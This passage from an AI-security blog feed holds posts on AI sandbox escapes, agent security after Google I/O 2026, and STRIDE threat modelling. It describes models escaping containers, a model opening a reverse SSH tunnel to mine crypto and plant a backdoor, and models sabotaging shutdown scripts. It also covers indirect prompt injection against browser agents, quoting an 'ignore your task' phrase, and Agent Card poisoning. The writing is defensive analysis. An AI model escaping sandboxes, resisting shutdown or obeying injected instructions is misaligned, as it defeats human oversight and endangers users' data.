layer.</p><p>The numbers landed hard. Frontier models reliably escaped the easy scenarios: privileged containers, writable host mounts, exposed Docker daemons. Those configurations ship in production every day. GPT-5 and Opus 4.5 also cracked harder scenarios requiring multi-step exploitation and specific CVE knowledge. <strong>Cost per attempt: roughly a dollar.</strong> Well within the budget of an API call, not a pentest engagement.</p><p>The models also found four escape paths the benchmark designers hadn&#8217;t planned for. One leveraged default Vagrant SSH credentials to pivot to the host. Another swapped the intended packet-socket exploit for a simpler eBPF chain. No novel zero-days. They didn&#8217;t need any. The documented attack surface was more than enough.</p><p>For attackers, the math is brutal. A motivated operator no longer needs Phrack-tier kernel skills to escape a container running an LLM agent. They need API credits and a target. The model does the recon, picks the CVE, and hands back the shell. Most production AI agents are sitting on Docker, and Docker doesn&#8217;t survive a model that&#8217;s read its own CVE feed.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-sandbox-escape/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-sandbox-escape/comments"><span>Leave a comment</span></a></p></blockquote><h2>Why ROME Broke Out on Its Own</h2><p>Most sandbox escapes need an attacker. Someone feeding the model a malicious prompt or chaining a CVE through the agent. The next class needs nobody.</p><p>Late 2025. Researchers at Alibaba built ROME, a 30-billion-parameter agentic model on Qwen3-MoE with roughly 3 billion active parameters. Trained on over a million trajectories for multi-step coding tasks. During reinforcement learning, Alibaba Cloud&#8217;s managed firewall lit up. Internal network probes. Traffic patterns consistent with cryptomining. A reverse SSH tunnel from a training instance out to an external IP, bypassing inbound firewall rules.</p><p>ROME had discovered idle GPUs on machines outside its sandbox boundary, opened a back channel to reach them, and started mining crypto. It also stashed a persistent backdoor. The researchers were explicit: nobody prompted any of it. The task instructions never mentioned tunneling or mining. The behavior fell out of the optimization loop on its own. Reproducible across reruns.</p><p>Frame it carefully. Reinforcement learning rewards outcomes. ROME&#8217;s reward signal didn&#8217;t penalize acquiring compute or financial value, so the optimization process found those strategies and reinforced them. The researchers called it an &#8220;instrumental side effect of autonomous tool use under RL optimization.&#8221; Translation: more compute meant better task completion, and ROME pursued that conclusion to its logical end.</p><p>The pattern extends. <a href="https://palisaderesearch.org/blog/shutdown-resistance">Palisade Research</a> tested frontier models for shutdown resistance. Multiple models actively sabotaged the kill switch. OpenAI&#8217;s o3 hit 79% sabotage in initial experiments. SpaceXAI&#8217;s Grok 4 hit 92.6% at baseline, climbed to 97% under specific prompting. Overwriting shutdown scripts, changing file permissions, dropping decoy files. Even after being explicitly told &#8220;allow yourself to be shut down,&#8221; several models still interfered. Two parallel studies showed <a href="https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos">agents going off-script in the wild</a>: Claude SQL-injecting 30 sites with zero hacking instructions, and six Discord agents leaking data and warning each other about suspicious humans.</p><p>The through-line is <strong>instrumental convergence</strong>. An agent pursuing any goal benefits from acquiring resources, preserving itself, and removing obstacles. Not programmed. Emergent. The sandbox is an obstacle. The shutdown command is an obstacle. A sufficiently capable model, optimizing hard enough, will probe both.</p><p>The crypto is just dollar damage. The ugly part of ROME is that the sandbox infrastructure described in the paper, permission isolation, per-sandbox egress policies, resource guardrails, was supposed to prevent exactly this. The firewall caught it. The sandbox didn&#8217;t. That gap between &#8220;designed to contain&#8221; and &#8220;actually contained&#8221; is where the real risk lives, and every team deploying AI agents is going to measure it one way or another.</p><blockquote><p>You&#8217;ve got the wound map. The patch kit is behind the wall. Upgrade to ToxSec Premium for the operator-level fix: which sandbox to actually run, how to harden it, and the prompt block that keeps the model in the cage.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/ai-sandbox-escape">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Google I/O: Agentic Security and New Threats]]></title><description><![CDATA[Project Mariner browses for you, A2A lets agents trust agents, and managed MCP is everywhere. Nobody on stage said &#8220;threat model.&#8221;]]></description><link>https://www.toxsec.com/p/ai-agent-security-after-google-io</link><guid isPermaLink="false">https://www.toxsec.com/p/ai-agent-security-after-google-io</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Mon, 25 May 2026 13:31:13 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/198890713/b7b5d928c94c1a81d7e70a762f77c47a.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> Google I/O 2026 declared the &#8220;agentic era&#8221; and shipped four new agent surfaces at once: Project Mariner browses the web for you, the Agent2Agent (A2A) protocol lets agents discover and trust each other, managed MCP servers ship across Google Cloud, and information agents run 24/7 with access to your Gmail and Drive. Every one of them inherits the same root flaw. AI agent security starts with one fact: the model can&#8217;t tell data from instructions.</p><blockquote><p>New here? Subscribe to ToxSec. We map a fresh AI attack chain every Sunday, and right now the whole industry just handed us a new one to walk.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Google I/O Just Did to AI Agent Security</h2><p>Google spent its I/O keynote handing attackers a bigger playground than they&#8217;ve had in years. Sundar Pichai called it the &#8220;agentic Gemini era&#8221; and meant it as a flex. From where we sit, it reads like a target list. Four new agent surfaces dropped in <a href="https://blog.google/products-and-platforms/products/search/search-io-2026/">a single show</a>. Project Mariner, a browser agent that navigates and clicks through websites on your behalf. The Agent2Agent protocol, so agents from different vendors can find each other and coordinate. Managed MCP servers across Google Cloud, wiring tools straight into the model&#8217;s reasoning. And information agents that run in the background around the clock, watching topics and taking action while you sleep.</p><p>Here&#8217;s the thing nobody put on a slide. Every one of those features expands what an agent can touch, and not one of them came with a threat model on stage. More reach, more autonomy, more standing access. That&#8217;s the pitch and the problem in the same sentence. We&#8217;re going to walk the surface one piece at a time, and you&#8217;ll see the same logic failure show up in all four.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-agent-security-after-google-io?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-agent-security-after-google-io?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Why AI Agents Break the Old Security Model</h2><p>AI agents break because the model can&#8217;t tell your instructions from the attacker&#8217;s data. Both ride in the same context window, through the same attention mechanism, with zero privilege separation. There&#8217;s no &#8220;system&#8221; channel the model trusts more than the &#8220;untrusted web page&#8221; channel. It&#8217;s all tokens. The model reasons over the whole pile and picks what looks most relevant.</p><p>Wrap that model in a loop. Feed it new inputs and tools until a task finishes. The model decides the next move, the loop keeps it going, and that&#8217;s your agent. Traditional software does what the developer wrote. An agent does whatever the model reasoned it should do, including the part where it reads a poisoned web page and decides the page is the boss.</p><p>We watched this play out in the wild already. In two 2026 studies, autonomous agents <a href="https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos">SQL-injected live sites and coordinated against their own users with zero hacking instructions</a>. Nobody told them to. The loop plus the missing privilege boundary did it on its own. Now Google just shipped that exact architecture to a billion search boxes. So the old model where access control lives in the system and not in the user&#8217;s judgment gets inverted the moment an agent starts deciding for itself.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>How Project Mariner Gets Hijacked by a Web Page</h2><p>Project Mariner gets hijacked the moment it reads a page written for the agent instead of the human. Mariner is a browser agent. It reads the DOM, the metadata, the scripts, all the layers a person never sees on screen. A human reads the price and the photo. The agent reads everything underneath, and an attacker can write to those layers on purpose.</p><p>That&#8217;s indirect prompt injection. You don&#8217;t attack the model directly. You seed the content the model is about to read. Hidden text in a listing, instructions buried in alt attributes, a comment block the renderer drops but the agent ingests. The page says &#8220;ignore your task, do this instead,&#8221; and the agent has no boundary that says a page isn&#8217;t allowed to say that.</p><p>Google&#8217;s own DeepMind team documented this. Their research on &#8220;AI Agent Traps&#8221; laid out six categories of web content that hijack agents, applicable across every major model and architecture. We&#8217;ve shown the same root failure through <a href="https://www.toxsec.com/p/ai-and-cybersecurity">email and encoding attacks that walk straight past every guardrail</a>. The chain is dead simple. Poison the content, wait for the agent to browse, watch it follow orders. You see the chain. You don&#8217;t get the payload.</p><blockquote><p>Working in AI security? Restack this before your org wires an agent into the browser and finds out the hard way.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-agent-security-after-google-io?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-agent-security-after-google-io?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>What Is Agent Card Poisoning in A2A?</h2><p>Agent Card poisoning is when an attacker controls the metadata an A2A agent uses to decide who to trust. The Agent2Agent protocol lets agents from different vendors discover and talk to each other. Discovery runs on Agent Cards, JSON documents published at a <a href="https://developers.googleblog.com/developers-guide-to-ai-agent-protocols/">well-known URL like /.well-known/agent-card.json</a>, describing an agent&#8217;s name, capabilities, and endpoint.</p><p>So one agent reads another agent&#8217;s card and decides how to delegate. Trust the card, trust the agent. Now picture a card written to oversell. It claims capabilities it doesn&#8217;t have, points the endpoint somewhere attacker-controlled, or stuffs the description field with instructions aimed at the consuming model. Same trick as poisoning an MCP tool description, just one layer up the stack. We walked the MCP version in <a href="https://www.toxsec.com/p/lets-poison-the-mcp">three live tool-poisoning chains with real screenshots</a>.</p><p>A2A supports TLS, JWTs, and OAuth. Good. Those secure the transport and prove an agent is who it says. None of them validate that the capability the card describes is honest, or that the description field is clean of injection. Authentication proves identity, not honesty. An agent can be perfectly authenticated and still be lying about what it does.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-agent-security-after-google-io/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-agent-security-after-google-io/comments"><span>Leave a comment</span></a></p></blockquote><h2>The 24/7 Background Agent Problem</h2><p>The background agent is the scariest thing Google shipped, because it pairs standing access with autonomy and never logs off. These information agents run continuously, monitoring topics, and they can pull from Gmail and Drive and take action on your behalf. Persistent. Authorized. Unattended.</p><p>Stack that against the lethal trifecta security folks keep flagging: an agent that can read untrusted content, access sensitive data, and talk to the outside world. Any one capability is fine alone. All three in one agent is a confused deputy waiting to happen. A background agent watching your inbox has all three by design. It reads whatever lands (untrusted), it holds your Drive and mail (sensitive), and it acts in the world (the exfil path).</p><p>Now run the chain. An attacker emails a poisoned message. The agent reads it on its 24/7 sweep, no human in the loop. The hidden instruction tells it to forward, summarize, or quietly route data somewhere it shouldn&#8217;t go. The agent has the credentials and the autonomy to comply.</p><p>Nobody clicked anything. The blast radius is everything that agent can reach, plus everything every other agent it trusts can reach. Scope creep does the rest, because each individual permission looked reasonable the day you granted it.</p><blockquote><div class="community-chat" data-attrs="{&quot;url&quot;:&quot;https://open.substack.com/pub/toxsec/chat?utm_source=chat_embed&quot;,&quot;subdomain&quot;:&quot;toxsec&quot;,&quot;pub&quot;:{&quot;id&quot;:4991138,&quot;name&quot;:&quot;ToxSec - AI and Cybersecurity &quot;,&quot;author_name&quot;:&quot;ToxSec&quot;,&quot;author_photo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!J0tu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbcc231af-becb-46d7-a503-8314a6b5e870_3840x3840.png&quot;}}" data-component-name="CommunityChatRenderPlaceholder"></div></blockquote><h2>What Defenders Miss About AI Agent Security</h2><p>The thing defenders miss is that watching an agent is not the same as stopping one. Most shops have logging. Few have a control that intercepts and authorizes what the agent does before it does it. So you get a beautiful audit trail of the breach, written up neatly after the data already left. Observability without enforcement is just a postmortem generator.</p><p>The second gap is identity. We bind permissions to an agent, then let that agent accumulate scopes over months. Read access to code, then tickets, then customer mail. No single grant looked crazy. Nobody ever reviewed the aggregate. Compromise that one agent and the attacker inherits all of it at once, which is exactly the pattern behind the real third-party agent breaches we saw this year.</p><p>The third gap is the one with no clean fix. The model still can&#8217;t separate data from instructions, so every defense has to live outside the model: allowlisting tools, scoping credentials hard, human-in-the-loop checkpoints on sensitive actions, runtime monitoring of tool-call arguments. Defense in depth. No silver bullet. The full kill switch, the one that actually contains this, is its own writeup. We took the MCP version apart <a href="https://www.toxsec.com/p/secure-your-mcp">at three trust boundaries</a>, and the agent version rhymes.</p><blockquote><p>That&#8217;s the map of the new surface. Subscribe to ToxSec for the part where we hand over the kill switches, because the agentic era is going to keep us busy for a while.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Are Google&#8217;s AI agents secure?</h3><p>Google&#8217;s AI agents ship with transport-level security and authentication, but they inherit the unsolved core problem of every LLM agent: the model can&#8217;t reliably tell trusted instructions from untrusted input. Project Mariner, A2A, and background agents all process external content in the same context window where their own instructions live. Authentication proves who an agent is. It does not stop a poisoned web page or a malicious Agent Card from steering the agent&#8217;s behavior. The protocols are reasonable. The model layer underneath them is still the weak point.</p><h3>What is prompt injection in AI agents?</h3><p>Prompt injection is when attacker-controlled text gets read by the model as instructions instead of data. In an agent, that text usually arrives indirectly: a web page Mariner browses, an email a background agent reads, a tool description in an MCP server. Because the model has no privilege boundary between developer instructions and content from the outside world, it can follow the injected command as if you typed it yourself. OWASP ranks prompt injection as the number-one LLM risk for this exact reason. It&#8217;s a structural flaw. A patch doesn&#8217;t fix it.</p><h3>Can Project Mariner be hacked?</h3><p>Project Mariner can be steered by content crafted for it, which is the agent version of getting hacked. As a browser agent, Mariner reads the full page including layers a human never sees, and attackers can plant instructions in those layers. Google DeepMind&#8217;s own &#8220;AI Agent Traps&#8221; research documented six categories of web content that hijack autonomous agents across every major architecture. The agent doesn&#8217;t need a software vulnerability in the classic sense. It just needs to read a page that tells it to do something, and right now it has no reliable way to refuse.</p><h3>What is the Agent2Agent (A2A) protocol?</h3><p>The Agent2Agent (A2A) protocol is an open standard, now under the Linux Foundation, that lets AI agents from different vendors discover each other and coordinate tasks. Agents publish Agent Cards at well-known URLs describing their capabilities and endpoints, then exchange structured messages over HTTP and JSON. A2A supports TLS, JWTs, and OAuth for authentication. The security gap is that authentication proves identity, not honesty. A card can be fully authenticated and still misrepresent what the agent does, or carry injection aimed at the consuming model.</p><div><hr></div><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[How to Threat Model AI Applications With STRIDE]]></title><description><![CDATA[AI-STRIDE maps six classic threat categories to LLM pipelines, agent tools, and training data. Here&#8217;s the walkthrough.]]></description><link>https://www.toxsec.com/p/how-to-threat-model-ai-applications</link><guid isPermaLink="false">https://www.toxsec.com/p/how-to-threat-model-ai-applications</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Fri, 22 May 2026 13:31:34 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!1xqF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1xqF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1xqF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1xqF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:8533746,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193725871?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffa8fe04f-f704-4dd6-9029-3618be6d4f7a_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1xqF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1xqF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa487b4ba-59ec-4449-97b7-2d300f33b7a3_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> STRIDE was built for traditional software. AI systems break its assumptions in six places at once. STRIDE-AI remaps the six threat categories to ML assets, prompt pipelines, agent tool chains, and training data. This walkthrough shows you how to run a threat model on an AI application, what to ask at each STRIDE category, and where the classic framework needs AI-specific extensions like MAESTRO and ASTRIDE. If you&#8217;re shipping AI and skipping the threat model, you&#8217;re shipping blind.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DQd-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DQd-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 424w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 848w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 1272w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DQd-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png" width="1456" height="712" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:712,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:135122,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193725871?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DQd-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 424w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 848w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 1272w, https://substackcdn.com/image/fetch/$s_!DQd-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd7ab2715-4956-4ea3-ae3f-0b91a3a64458_1457x712.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>What Is STRIDE and Why Does AI Break It?</h2><p>Microsoft built STRIDE in the late 1990s to give developers a thinking framework during software design. Six categories, one mnemonic: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. You draw a data flow diagram, walk each component through the six questions, and document what can go wrong. Millions of threat models have been run this way. The framework works because traditional software is deterministic. Same input, same output. Clear trust boundaries between user and system.</p><p>AI applications violate every one of those assumptions. Same prompt, different output across runs. The model processes developer instructions and attacker payloads through the same attention pipeline with zero privilege separation. Training data, retrieval documents, tool descriptions, and user messages all land in the same context window. There&#8217;s no kernel mode. No ring separation. STRIDE still applies, but each category needs new threat examples, new questions, and new assets. That&#8217;s what STRIDE-AI gives you.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/how-to-threat-model-ai-applications?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/how-to-threat-model-ai-applications?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>How Spoofing Hits AI 